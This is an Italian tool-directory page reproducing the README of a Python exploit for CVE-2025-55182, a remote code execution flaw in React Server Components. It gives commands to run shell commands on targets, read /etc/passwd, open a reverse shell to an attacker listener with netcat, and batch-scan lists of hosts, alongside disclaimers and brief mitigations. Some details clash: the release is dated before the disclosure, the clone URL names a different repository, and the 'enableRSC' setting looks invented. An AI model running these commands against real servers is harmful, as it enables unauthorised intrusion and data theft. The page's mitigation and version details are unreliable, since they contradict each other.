Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182_liyon — Exploit basato su Python per CVE-2025-55182 (RCE React Server Components) con shell interattiva, reverse shell, scansione batch e ambiente vulnerabile basato su Docker per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
Scanner di VulnerabilitàGenerazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
Strumento di Accesso Remoto
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

Exploit basato su Python per CVE-2025-55182 (RCE React Server Components) con shell interattiva, reverse shell, scansione batch e ambiente vulnerabile basato su Docker per test di sicurezza autorizzati.

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - Esecuzione Remota di Codice nei React Server Components

⚠️ Dichiarazione legale: Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza, ai test di penetrazione autorizzati e a scopi educativi. Utilizzare questo strumento su sistemi target senza autorizzazione esplicita è illegale e non etico.

📋 Panoramica

CVE-2025-55182 è una vulnerabilità critica di esecuzione remota di codice (RCE) nei React Server Components (RSC) che consente a un utente malintenzionato non autenticato di eseguire codice arbitrario sul server tramite deserializzazione malevola di oggetti JavaScript.

🎯 Dettagli della vulnerabilità

ProprietàValore
ID CVECVE-2025-55182
Punteggio CVSS9.8 (Critico)
Vettore di attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione utenteNessuna
ImpattoAlto (Riservatezza, Integrità, Disponibilità)
Componente interessatoReact Server Components (RSC)
Versioni interessateReact 18.x - 19.x (build specifici)
Data di divulgazione3 dicembre 2025
Alias CVEReact2Shell

🔍 Dettagli tecnici

Causa principale: React Server Components deserializza in modo non sicuro oggetti JavaScript forniti dall'utente durante l'elaborazione dei payload RSC, consentendo a un utente malintenzionato di iniettare codice malevolo che viene eseguito sul server.

Vettore di attacco: Payload RSC malevoli nelle richieste HTTP Impatto: Esecuzione remota di codice senza autenticazione, compromissione del server, fuga di dati

🚀 Funzionalità

  • ✅ Strumento di sfruttamento a file singolo con shell interattiva in Python
  • ✅ Rilevamento automatico della vulnerabilità
  • ✅ Scansione batch multi-thread
  • ✅ Ambiente React vulnerabile basato su Docker
  • ✅ Supporto per molteplici tipi di payload
  • ✅ Registrazione dettagliata e gestione degli errori
  • ✅ Stabilimento di reverse shell
  • ✅ Codifica Base64 dei payload

📦 Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# Installa le dipendenze
pip install -r requirements.txt

🎯 Utilizzo

Avvio rapido

root@kitploit:~
# Installa le dipendenze
pip install requests

# Esegui un comando sul target vulnerabile
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# Modalità shell interattiva
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

Opzioni avanzate

root@kitploit:~
# Comando personalizzato
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# Reverse shell con IP/porta personalizzati
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# Scansione batch
python exploit/batch_scanner.py -f targets.txt

# Modalità verbosa
python exploit/cve_2025_55182.py -u http://target.com -v

# User-Agent personalizzato
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ Configurazione dell'ambiente di test

Utilizzo di Docker (consigliato)

root@kitploit:~
cd target
docker-compose up -d

Configurazione manuale

root@kitploit:~
cd target
npm install
npm run dev

Accedi all'applicazione vulnerabile: http://localhost:3000

📊 Scenari di attacco

Scenario 1: Esecuzione di comandi

Esegui un singolo comando sul server vulnerabile:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

Output previsto:

root@kitploit:~
[+] Rilevamento vulnerabilità riuscito: React Server Components RCE
[+] Comando eseguito: id
[+] Risposta:
uid=0(root) gid=0(root) groups=0(root)

Scenario 2: Shell interattiva

Ottieni una shell interattiva sul server vulnerabile:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

Funzionalità:

  • Completamento tramite Tab
  • Cronologia dei comandi
  • Sessioni shell multiple
  • Caricamento/scaricamento file

Scenario 3: Reverse shell

Stabilisci una connessione reverse shell:

root@kitploit:~
# Sulla macchina dell'attaccante
nc -lvnp 4444

# Esegui lo strumento di sfruttamento
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

Scenario 4: Scansione batch

Scansiona più target per la vulnerabilità:

root@kitploit:~
# Crea il file dei target
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# Esegui lo scanner batch
python exploit/batch_scanner.py -f targets.txt

🛡️ Mitigazione e difesa

Azioni immediate

  1. Aggiorna React

    root@kitploit:~
    npm install react@latest
    # Aggiorna alla versione corretta
    
  2. Blocca le richieste RSC

    root@kitploit:~
    // Disabilita temporaneamente RSC
    const config = {
      enableRSC: false
    }
    
  3. Regole WAF

    • Blocca le richieste contenenti pattern RSC
    • Monitora i payload JavaScript sospetti
    • Applica limiti di frequenza agli endpoint RSC

Correzione a lungo termine

  • Implementa la convalida degli input per i payload RSC
  • Utilizza l'esecuzione JavaScript in sandbox
  • Esegui audit di sicurezza regolari
  • Monitora l'accesso non autorizzato a RSC

📚 Documentazione

  • Analisi della vulnerabilità - Analisi tecnica approfondita
  • Guida all'uso - Istruzioni complete per l'uso
  • Difesa e correzione - Hardening della sicurezza

🧪 Test

Test manuale

root@kitploit:~
# Configura l'ambiente vulnerabile
cd target && docker-compose up -d

# Testa la vulnerabilità
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confermata'"

Test automatico

root@kitploit:~
# Esegui la suite di test
python tests/test_exploit.py

🔬 Riferimenti di ricerca

  • Voce NVD per CVE-2025-55182
  • Bollettino di sicurezza React
  • Blog di ricerca di Wiz
  • Analisi di Project Zero

📝 Registro delle modifiche

v1.0.0 (2025-04-02)

  • Rilascio iniziale
  • Sfruttamento RCE singolo target
  • Modalità shell interattiva
  • Supporto reverse shell
  • Scansione batch
  • Ambiente Docker vulnerabile
  • Documentazione completa

🎓 Scopo educativo

Questo strumento dimostra:

  • Come funziona una vulnerabilità RCE in React
  • Pratiche corrette di sviluppo degli exploit
  • Metodologie di valutazione della sicurezza
  • Principi di hacking etico

👥 Collaboratori

  • Ricercatore di sicurezza - Implementazione iniziale

📄 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli.

⚠️ Dichiarazione legale ed etica

Importante: Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.

Requisiti legali

  • Utilizza solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione.
  • Rispetta tutte le leggi e le normative applicabili.
  • Segnala le vulnerabilità ai fornitori in modo responsabile.
  • Segui le linee guida per la divulgazione responsabile.

Comportamenti vietati

  • Accesso non autorizzato a sistemi informatici.
  • Presa di mira di sistemi senza autorizzazione.
  • Utilizzo della vulnerabilità per scopi malevoli.
  • Divulgazione o distruzione di dati.

Conseguenze legali

  • Denunce penali per accesso non autorizzato.
  • Responsabilità civile per danni.
  • Possibile reclusione.
  • Conseguenze professionali.

Utilizzando questo strumento, accetti di:

  • Rispettare tutte le leggi locali e internazionali.
  • Utilizzarlo solo per test di sicurezza autorizzati.
  • Segnalare le vulnerabilità trovate in modo responsabile.
  • Non utilizzarlo per attività malevole o illegali.

📞 Segnalazione di vulnerabilità

Se scopri questa vulnerabilità in sistemi di produzione:

  1. Segnala al fornitore

    • Team React: [email protected]
    • Segui la divulgazione responsabile
  2. Assegnazione CVE

    • Invia a NIST NVD
    • Segui la tempistica di divulgazione
  3. Comunità della sicurezza

    • Condividi le scoperte (dopo la correzione)
    • Contribuisci alla conoscenza della sicurezza

Ricorda: La ricerca sulla sicurezza dovrebbe essere sempre etica e legale. Usa le tue competenze per rendere Internet più sicuro! 🛡️

Scarica lo strumento